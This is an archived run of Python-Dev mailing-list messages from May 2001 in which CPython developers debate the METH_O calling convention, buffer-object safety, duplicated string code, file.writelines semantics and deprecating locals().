Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100
References: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com> <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <20010528005058.H690@xs4all.nl>

On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote:
> On Sun, 27 May 2001, Tim Peters wrote:

> > Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> > there some advantage to using METH_VARARGS in this case?

> So you can't do

> >>> len(1,2)
> 2

> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

And don't forget the method-specific error message by passing ':len' in the
format string. Of course, this can easily (and probably should) be done by
passing another argument to whatever parses arguments in METH_O, rather than
invoking string parsing magic every call.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Mon May 28 00:58:30 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:58:30 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400
References: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain> <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>
Message-ID: <20010528005830.I690@xs4all.nl>

On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote:

> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
>     size-ly y'rs  - tim

And recycle a quote a day ;)

> PS:  But today I'll add another:  add at least one comment to the code --
> this stuff is a bitch to reverse-engineer.

But not just any comment, please! The Pine sourcecode is riddled with calls
to 'mm_critical(stream)', and each call I've seen so far is nicely commented
with the utterly useless comment '/* go critical */'.

I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe-
 -what-Pine-actually-tries-to-do-ly y'rs,

-- 
Thomas Wouters <thomas at xs4all.net>



From martin at loewis.home.cs.tu-berlin.de  Mon May 28 00:45:53 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 00:45:53 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from
	Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT))
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<3B0E1E2C.4BC121B5@lemburg.com>
	<200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
	<3B0ED0C7.F1A665EA@lemburg.com>
	<200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
	<3B0F7D44.1A12CE0F@lemburg.com>
	<200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com>
Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de>

> I'd like to qualify this a bit.  What I reported earlier is that the
> BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in
> PyArg_ParseTuple().  This strikes me as excessive, because it's a
> static property of the code.  (One could imagine writing a Python
> script that parsed the "O!|is#" format strings and generated
> efficient, specialized C code for that format.)
> 
> If we benchmark other programs, particularly those that do more work
> in the builtins, the relative cost of the argument processing will be
> lower.

Certainly: If the work inside the function increases, the overhead of
calling it will be less visible. What the benchmark shows, however,
and what my patch addresses, is that the time for *calling* a function
is primarily spent in PyArg_ParseTuple (and not in, say, building
argument tuples, putting parameters on the stack, fetching function
addresses, building method objects, and so on).

Regards,
Martin


From tim.one at home.com  Mon May 28 01:17:27 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 19:17:27 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <20010528005058.H690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>

[Thomas Wouters]
> And don't forget the method-specific error message by passing ':len' in
> the format string. Of course, this can easily (and probably should) be
> done by passing another argument to whatever parses arguments in
> METH_O, rather than invoking string parsing magic every call.

Martin's patch automatically inserts the name of the function in the
TypeError it raises when a METH_O call doesn't get exactly one argument, or
gets one or more keyword arguments.

Stick to METH_O and it's a clear win, even in this respect:  there's no info
in an explicit ":len" he's not already deducing, and almost all instances of
"O:name" formats today are exactly the same this way:

if (!PyArg_ParseTuple(args, "O:abs", &v))
if (!PyArg_ParseTuple(args, "O:callable", &v))
if (!PyArg_ParseTuple(args, "O:id", &v))
if (!PyArg_ParseTuple(args, "O:hash", &v))
if (!PyArg_ParseTuple(args, "O:hex", &v))
if (!PyArg_ParseTuple(args, "O:float", &v))
if (!PyArg_ParseTuple(args, "O:len", &v))
if (!PyArg_ParseTuple(args, "O:list", &v))
else if (!PyArg_ParseTuple(args, "O:min/max", &v))
if (!PyArg_ParseTuple(args, "O:oct", &v))
if (!PyArg_ParseTuple(args, "O:ord", &obj))
if (!PyArg_ParseTuple(args, "O:reload", &v))
if (!PyArg_ParseTuple(args, "O:repr", &v))
if (!PyArg_ParseTuple(args, "O:str", &v))
if (!PyArg_ParseTuple(args, "O:tuple", &v))
if (!PyArg_ParseTuple(args, "O:type", &v))

Those are all the ones in bltinmodule.c, and nearly all of them are called
extremely frequently in *some* programs.  The only oddball is min/max, but
then it supports more than one call-list format and so isn't a METH_O
candidate anyway.  Indeed, Martin's patch gives a *better* message than we
get for some mistakes today:

>>> len(val=2)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: len() takes exactly 1 argument (0 given)
>>>

Martin's would say

    TypeError: len takes no keyword arguments

in this case.  He should add "()" after the function name.  He should also
throw away the half of the patch complicating and slowing METH_O to get some
theoretical speedup in other cases:  make the one-arg builtins fly just as
fast as humanly possible.


From greg at cosc.canterbury.ac.nz  Mon May 28 02:23:55 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:23:55 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz>

> However, it has one fatal flaw, and no one seems
> to know what to do about it.

I think it would be safe if:

1) it kept a reference to the underlying object, and

2) it re-fetched the pointer and length info each time it was
   needed, using the underlying object's buffer interface.
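
The proposal, modelled in Python under stated assumptions: `GrowableArray`
and `RefetchingBuffer` are hypothetical, a list stands in for raw memory, and
growth moves the data to a new block.  The buffer holds only a reference to
the object and asks for the current block and length on every access, so a
move between accesses does no harm.

```python
class GrowableArray:
    """Hypothetical array whose storage block moves when it grows."""

    def __init__(self, items):
        self.block = list(items)

    def append(self, item):
        self.block = self.block + [item]  # like realloc() moving the data

    def get_buffer(self):
        return self.block


class RefetchingBuffer:
    """Keeps the object alive but never caches its pointer or length."""

    def __init__(self, obj):
        self.obj = obj

    def __len__(self):
        return len(self.obj.get_buffer())

    def __getitem__(self, i):
        return self.obj.get_buffer()[i]  # refetch on every access


arr = GrowableArray([1, 2, 3])
buf = RefetchingBuffer(arr)
arr.append(4)
print(len(buf), buf[3])  # prints 4 4
```

The trade-off is an extra trip through the buffer interface on every index
operation.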

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Mon May 28 02:28:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:28:41 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010525132752.B5402@lyra.org>
Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz>

Greg Stein <gstein at lyra.org>

> "badly" is overstating the problem. It caches a pointer when it shouldn't.
> This doesn't work well

But "doesn't work well" means "can crash the interpreter".
I don't think "badly" is an overstatement here...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one at home.com  Mon May 28 03:42:30 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 21:42:30 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B10D758.3741AC2F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMENEKEAA.tim.one@home.com>

[MAL]
> I guess there are three ways to "solve" this:
>
> a) mutable types don't implement the getreadbuf interface

Of the few types that implement it today, that would leave only strings
(8-bit and Unicode).  Too much machinery just for that.  Besides, I once
posted an example to c.l.py showing how to use regexps to search mmap'ed
files, so *that* must continue to work forever <wink>.

> b) the getreadbuf interface is complemented with a callback
>    interface, so the the buffer object can be notified of
>    the change

I like this best, although there's no bound on the number of buffers that
may need to be notified in case of change (i.e., the object would need to
maintain a list of buffers to be notified).

> c) calling getreadbuf on a mutable object causes this object
>    to become immutable

Even easier, core dump as soon as getreadbuf is called <wink>.

[Greg Ewing]
> I think it would be safe if:
>
> 1) it kept a reference to the underlying object, and

That much it already does.

> 2) it re-fetched the pointer and length info each time it was
>    needed, using the underlying object's buffer interface.

If after

    b = buffer(some_object)

b.__getitem__ needed to refetch the info between

    b[i]
and
    b[i+1]

I expect it would be so slow even Greg wouldn't want it anymore.


From tim.one at home.com  Mon May 28 03:52:18 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 21:52:18 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0FD023.C4588919@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>

[Tim]
> About combining strop and buffers and strings, don't forget
> unicodeobject.c:  that's got oodles of basically duplicate code too.
> /F suggested dealing with the minor differences via maintaining one
> code file that gets compiled multiple times w/ appropriate #defines.

[MAL]
> Hmm, that only saves us a few kB in source, but certainly not
> in the object files.

That's not the point.  Manually duplicated code blocks always get out of
synch, as people fix bugs in, or enhance, one of them but don't even know
about the others.  /F brought this up after I pissed away a few hours trying
to repair one of these in all places, and he noted that strop.replace() and
string.replace() are woefully inefficient anyway.

> The better idea would be making the types subclass from a generic
> abstract string object -- I just don't know how this will be
> possible with Guido's type patches. We'll just have to wait,
> I guess.

Wait for what?  If it were possible, is the chance that you'd take time to
rework unicodeobject.c to "subclass from a generic abstract string object"
greater than 0?  The chance that I would is exactly 0.


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 08:36:49 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 08:36:49 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>

> How is METH_O different than METH_OLDARGS? 

METH_O will raise an exception if the function is called with more
than one argument, without calling the function. METH_OLDARGS will
pass a tuple in this case.

I believe you cannot distinguish between a single tuple argument and
an invocation with multiple arguments in a METH_OLDARGS function, is
that true?

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 09:40:54 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 09:40:54 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>

When investigating calling conventions, I took a special look at
METH_OLDARGS occurrences. While most of them look reasonable,
file.writelines caught my attention. It has

	if (args == NULL || !PySequence_Check(args)) {
		PyErr_SetString(PyExc_TypeError,
			   "writelines() argument must be a sequence of strings");
		return NULL;
	}

Because it is a METH_OLDARGS method, you can do

f=open("/tmp/x","w")
f.writelines("foo\n","bar\n")

With my upcoming patches, I'd replace this with METH_O, making this
call illegal. Does anybody see a problem with that change in
semantics?

Regards,
Martin


From thomas at xs4all.net  Mon May 28 10:17:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 10:17:58 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200
References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <20010528101758.K690@xs4all.nl>

On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote:

> When investigating calling conventions, I took a special look at
> METH_OLDARGS occurrences. While most of them look reasonable,
> file.writelines caught my attention. It has

> 	if (args == NULL || !PySequence_Check(args)) {
> 		PyErr_SetString(PyExc_TypeError,
> 			   "writelines() argument must be a sequence of strings");
> 		return NULL;
> 	}

> Because it is a METH_OLDARGS method, you can do

> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")

> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Hell yeah. About the same problem as with the 'l.append("foo", "bar")'
problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in
2.0, by converting a PyList_Check into a PySequence_Check:

$ python1.5
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
Traceback (innermost last):
  File "<stdin>", line 1, in ?
TypeError: writelines() requires list of strings

$ python2.0
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
>>> 

I do think we'll have to allow for this for one more release, with warnings
and all. It's extremely unlikely that anyone is using this, but changing it
without warning will definitely not benefit 2.x's image wrt. stability ;P

If bugfix-releases were allowed to generate additional warnings, I'd add a
warning to 2.1.1....
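One way "one more release, with warnings" could look, sketched in Python rather than C: a hypothetical wrapper (writelines_compat is not a real API) that keeps the old multi-argument form working but emits a DeprecationWarning.

```python
import io
import warnings


def writelines_compat(f, *args):
    """Hypothetical transitional writelines(): one sequence is the
    supported form; several strings still work but trigger a warning."""
    if len(args) == 1:
        lines = args[0]
    elif len(args) > 1:
        # The old METH_OLDARGS behaviour: the extra arguments arrive as a
        # tuple, which happens to be a sequence of strings.
        warnings.warn("writelines() with several arguments is deprecated; "
                      "pass one sequence of strings instead",
                      DeprecationWarning, stacklevel=2)
        lines = args
    else:
        raise TypeError("writelines() takes exactly one argument (0 given)")
    for line in lines:
        f.write(line)


buf = io.StringIO()
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    writelines_compat(buf, ["foo\n", "bar\n"])  # supported: no warning
    writelines_compat(buf, "baz\n", "qux\n")    # legacy: warns, still writes
```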

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Mon May 28 11:04:51 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:04:51 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>
Message-ID: <3B1214B3.9A4C295D@lemburg.com>

Tim Peters wrote:
> 
> [Tim]
> > About combining strop and buffers and strings, don't forget
> > unicodeobject.c:  that's got oodles of basically duplicate code too.
> > /F suggested dealing with the minor differences via maintaining one
> > code file that gets compiled multiple times w/ appropriate #defines.
> 
> [MAL]
> > Hmm, that only saves us a few kB in source, but certainly not
> > in the object files.
> 
> That's not the point.  Manually duplicated code blocks always get out of
> synch, as people fix bugs in, or enhance, one of them but don't even know
> about the others.  /F brought this up after I pissed away a few hours trying
> to repair one of these in all places, and he noted that strop.replace() and
> string.replace() are woefully inefficient anyway.

Ok, so what we'd need is a bunch of generic low-level string 
operations: one set for 8-bit and one for 16-bit code. 

Looking at unicodeobject.c it seems that the section "Helpers" would
be a good start, plus perhaps a few bits from the method implementations
refactored to form a low-level string template library.

Perhaps we should move this code into
a file stringhelpers.h which then gets included by stringobject.c
and unicodeobject.c with appropriate #defines set up for
8-bit strings and for Unicode.
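Compiling one helper file twice under different #defines is a C preprocessor technique, but the payoff can be sketched in Python: one hypothetical replace routine (generic_replace is illustrative, not part of any library) that works unchanged on both 8-bit data (bytes) and text (str), because it relies only on find(), slicing and join().

```python
def generic_replace(s, old, new, count=-1):
    """Replace occurrences of old with new in s, for str or bytes alike.

    count < 0 means replace all occurrences.  Empty patterns are not
    handled in this sketch.
    """
    if not old:
        raise ValueError("empty pattern not supported in this sketch")
    pieces = []
    start = 0
    while count != 0:
        i = s.find(old, start)
        if i < 0:
            break
        pieces.append(s[start:i])
        pieces.append(new)
        start = i + len(old)
        count -= 1
    pieces.append(s[start:])
    # s[:0] is an empty object of the same type as s ('' or b'').
    return s[:0].join(pieces)
```

The single source is what matters: a bug fixed here is fixed for both string types, which is the synchronization problem Tim describes.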

> > The better idea would be making the types subclass from a generic
> > abstract string object -- I just don't know how this will be
> > possible with Guido's type patches. We'll just have to wait,
> > I guess.
> 
> Wait for what?  If it were possible, is the chance that you'd take time to
> rework unicodeobject.c to "subclass from a generic abstract string object"
> greater than 0?  The chance that I would is exactly 0.

Well, that's hard to say. It would certainly be low-priority;
same for the above refactoring.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Mon May 28 11:19:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:19:16 +0200
Subject: [Python-Dev] Special-casing "O"
References: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>
Message-ID: <3B121814.E5E9896A@lemburg.com>

Tim Peters wrote:
> 
> [Thomas Wouters]
> > And don't forget the method-specific errormessage by passing ':len' in
> > the format string. Of course, this can easily be (and probably should)
> > done by passing another argument to whatever parses arguments in
> > METH_O, rather than invoking string parsing magic every call.
> 
> Martin's patch automatically inserts the name of the function in the
> TypeError it raises when a METH_O call doesn't get exactly one argument, or
> gets a (one or more) keyword argument.
> 
> Stick to METH_O and it's a clear win, even in this respect:  there's no info
> in an explicit ":len" he's not already deducing, and almost all instances of
> "O:name" formats today are exactly the same this way:
> 
> if (!PyArg_ParseTuple(args, "O:abs", &v))
> if (!PyArg_ParseTuple(args, "O:callable", &v))
> if (!PyArg_ParseTuple(args, "O:id", &v))
> if (!PyArg_ParseTuple(args, "O:hash", &v))
> if (!PyArg_ParseTuple(args, "O:hex", &v))
> if (!PyArg_ParseTuple(args, "O:float", &v))
> if (!PyArg_ParseTuple(args, "O:len", &v))
> if (!PyArg_ParseTuple(args, "O:list", &v))
> else if (!PyArg_ParseTuple(args, "O:min/max", &v))
> if (!PyArg_ParseTuple(args, "O:oct", &v))
> if (!PyArg_ParseTuple(args, "O:ord", &obj))
> if (!PyArg_ParseTuple(args, "O:reload", &v))
> if (!PyArg_ParseTuple(args, "O:repr", &v))
> if (!PyArg_ParseTuple(args, "O:str", &v))
> if (!PyArg_ParseTuple(args, "O:tuple", &v))
> if (!PyArg_ParseTuple(args, "O:type", &v))
> 
> Those are all the ones in bltinmodule.c, and nearly all of them are called
> extremely frequently in *some* programs.  The only oddball is min/max, but
> then it supports more than one call-list format and so isn't a METH_O
> candidate anyway.  Indeed, Martin's patch gives a *better* message than we
> get for some mistakes today:
> 
> >>> len(val=2)
> Traceback (most recent call last):
>  File "<stdin>", line 1, in ?
> TypeError: len() takes exactly 1 argument (0 given)
> >>>
> 
> Martin's would say
> 
>     TypeError: len takes no keyword arguments
> 
> in this case.  He should add "()" after the function name.  He should also
> throw away the half of the patch complicating and slowing METH_O to get some
> theoretical speedup in other cases:  make the one-arg builtins fly just as
> fast as humanly possible.
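The checks described above (exactly one positional argument, no keywords, and an error message naming the function with "()" appended) can be modelled as a Python decorator. This is a hypothetical sketch of the checks, not Martin's patch.

```python
import functools


def meth_o(func):
    """Hypothetical decorator mimicking a METH_O argument check."""
    name = func.__name__

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        if kwargs:
            raise TypeError(f"{name}() takes no keyword arguments")
        if len(args) != 1:
            raise TypeError(f"{name}() takes exactly one argument "
                            f"({len(args)} given)")
        return func(args[0])
    return wrapper


@meth_o
def my_len(obj):
    return len(obj)
```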

If we end up only optimizing the re.match("O+") case, we wouldn't need 
the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
and Martin could call the underlying API with one or more PyObject*
taken directly from the Python VM stack.

In that case, please consider at least supporting "O", "OO" and "OOO"
with optional arguments treated like I suggested in an earlier
posting (simply pass NULL and let the API take care of assigning
a default value).

This would take care of most builtins:

Python/bltinmodule.c:
--      if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq))
--      if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b))
--      if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt))
--      if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value))
--      if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z))
--      if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result))
--      if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls))
--      if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls))
--      if (!PyArg_ParseTuple(args, "O:abs", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict))
--      if (!PyArg_ParseTuple(args, "O:callable", &v))
--      if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i))
--      if (!PyArg_ParseTuple(args, "O:id", &v))
--      if (!PyArg_ParseTuple(args, "O:hash", &v))
--      if (!PyArg_ParseTuple(args, "O:hex", &v))
--      if (!PyArg_ParseTuple(args, "O:float", &v))
--      if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w))
--      if (!PyArg_ParseTuple(args, "O:len", &v))
--      if (!PyArg_ParseTuple(args, "O:list", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step))
--      else if (!PyArg_ParseTuple(args, "O:min/max", &v))
--      if (!PyArg_ParseTuple(args, "O:oct", &v))
--      if (!PyArg_ParseTuple(args, "O:ord", &obj))
--      if (!PyArg_ParseTuple(args, "O:reload", &v))
--      if (!PyArg_ParseTuple(args, "O:repr", &v))
--      if (!PyArg_ParseTuple(args, "O:str", &v))
--      if (!PyArg_ParseTuple(args, "O:tuple", &v))
--      if (!PyArg_ParseTuple(args, "O:type", &v))
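The catch with such a flag is that the callee must still learn how many arguments arrived. One hypothetical answer is to store the minimum and maximum arity in the method table and pad omitted optional arguments with a NULL-like marker, as suggested above. A Python sketch using the "OO|O:getattr" signature from the list, with MISSING standing in for a NULL pointer (all names are illustrative):

```python
MISSING = object()   # stands in for a NULL PyObject* (hypothetical)


def dispatch_objargs(entry, *args):
    """Call entry's function with exactly max_args positional arguments,
    padding omitted optional ones with MISSING."""
    func, min_args, max_args = entry
    n = len(args)
    if not min_args <= n <= max_args:
        raise TypeError(f"{func.__name__}() takes {min_args} to {max_args} "
                        f"arguments ({n} given)")
    return func(*args, *([MISSING] * (max_args - n)))


def getattr_impl(obj, name, default):
    # The callee decides what a missing default means.
    if default is MISSING:
        return getattr(obj, name)
    return getattr(obj, name, default)


# Hypothetical table entry for "OO|O:getattr": (function, min, max).
GETATTR_ENTRY = (getattr_impl, 2, 3)
```

The cost is an extra range check and padding on every call, which is exactly the overhead a plain one-argument fast path avoids.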

-- 
Marc-Andre Lemburg


From jeremy at digicool.com  Mon May 28 18:45:27 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Mon, 28 May 2001 12:45:27 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <15122.32935.53414.174221@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin at loewis.home.cs.tu-berlin.de> writes:

  >> How is METH_O different than METH_OLDARGS?

  MvL> METH_O will raise an exception if the function is called with
  MvL> more than one argument, without calling the
  MvL> function. METH_OLDARGS will pass a tuple in this case.

Yes, I see that now.  I'm +1 on METH_O, then.

Jeremy


From tim.one at home.com  Mon May 28 19:23:47 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 13:23:47 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEONKEAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I believe you cannot distinguish between a single tuple argument and
> an invocation with multiple arguments in a METH_OLDARGS function, is
> that true?

That's the conclusion I reached after staring at the code.


From fdrake at acm.org  Mon May 28 20:20:01 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:20:01 -0400 (EDT)
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>

Andrew Kuchling writes:
 > Looking at a bug report Fred forwarded, I realized that after
 > py-howto.sourceforge.net was set up, www.python.org/doc/howto was
 > never changed to redirect to the SF site instead.  As of this
 > afternoon, that's now done; links on www.python.org have been updated,
 > and I've added the redirect.
 > 
 > Question: is it worth blowing away the doc/howto/ tree now, or should
 > it just be left there, inaccessible, until work on www.python.org
 > resumes?

Andrew,
  It looks like I never replied to this.  It's probably dropped off
your radar, but I'd say the answer is that the files on parrot should
be discarded sooner rather than later -- when we actually manage to
work on python.org we're that much more likely to have forgotten the
redirection entirely!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Mon May 28 20:33:13 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:33:13 -0400 (EDT)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico>
References: <LNBBLJKPBEHFEDALKOLCOEMPJEAA.tim.one@home.com>
	<200103112137.QAA13084@cj20424-a.reston1.va.home.com>
	<001c01c0aa95$55836f60$325821c0@newmexico>
Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>

Guido wrote:
 > Actually, I intend to deprecate locals().  For now, globals() are
 > fine.  I also intend to deprecate vars(), at least in the form that is
 > equivalent to locals().

Samuele Pedroni writes:
 > That's fine for me. Will that deprecation be already active with 2.1, e.g.
 > having locals() and param-less vars() raise a warning?
 > I imagine a (new) function that produces a snapshot of the values in the
 > local, free and cell vars of a scope can do the job required for simple
 > debugging (the copy will not allow to modify back the values), 
 > or another approach...

  Nothing has happened on this front yet.  Should I add deprecation
notes to the documentation while Guido is on vacation, or wait to ask
him when he gets back?  Or was this matter resolved when I wasn't
paying attention?


  -Fred


From tim.one at home.com  Tue May 29 01:42:05 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 19:42:05 -0400
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPMKEAA.tim.one@home.com>

[Guido]
> Actually, I intend to deprecate locals().  For now, globals() are
> fine.  I also intend to deprecate vars(), at least in the form that is
> equivalent to locals().

[Fred L. Drake, Jr.]
>   Nothing has happened on this front yet.  Should I add deprecation
> notes to the documentation while Guido is on vacation, or wait to ask
> him when he gets back?  Or was this matter resolved when I wasn't
> paying attention?

I advise continuing to ignore it.  Nothing was resolved, and to judge from a
trial balloon I floated on c.l.py at the time, it's not a deprecation that
will be greeted with enthusiasm.  The problems range from people doing

def f(...):
     ...
     print "..." % locals()

to people mutating locals() at module level because they simply don't
understand that globals() is the same (but correct) thing to use there.

Due to the first example, and as Samuele may <wink> have already suggested,
we at least need to implement a mapping object capturing name bindings
before we can even think about deprecating locals() for real.
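A rough idea of such a snapshot, under stated assumptions: it relies on CPython's sys._getframe(), which is an implementation detail, and returns a read-only copy (types.MappingProxyType over a fresh dict), so writes cannot leak back into the frame. snapshot_locals is a hypothetical name. It still serves the "% locals()" formatting idiom:

```python
import sys
import types


def snapshot_locals():
    """Hypothetical helper: read-only copy of the caller's local bindings."""
    frame = sys._getframe(1)        # CPython-specific: the caller's frame
    try:
        return types.MappingProxyType(dict(frame.f_locals))
    finally:
        del frame                   # don't keep the frame alive via a cycle


def greet(name, count):
    # The common idiom that makes deprecating locals() painful.
    return "%(name)s has %(count)d items" % snapshot_locals()


print(greet("spam", 3))   # spam has 3 items
```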


From tim.one at home.com  Tue May 29 02:01:33 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 20:01:33 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B1214B3.9A4C295D@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPPKEAA.tim.one@home.com>

[Tim]
> Wait for what?  If it were possible, is the chance that you'd
> take time to rework unicodeobject.c to "subclass from a generic
> abstract string object" greater than 0?  The chance that I
> would is exactly 0.

[MAL]
> Well, that's hard to say. It would certainly be low-priority;
> same for the above refactoring.

I think you must have missed this when it first came up here:  /F suggested
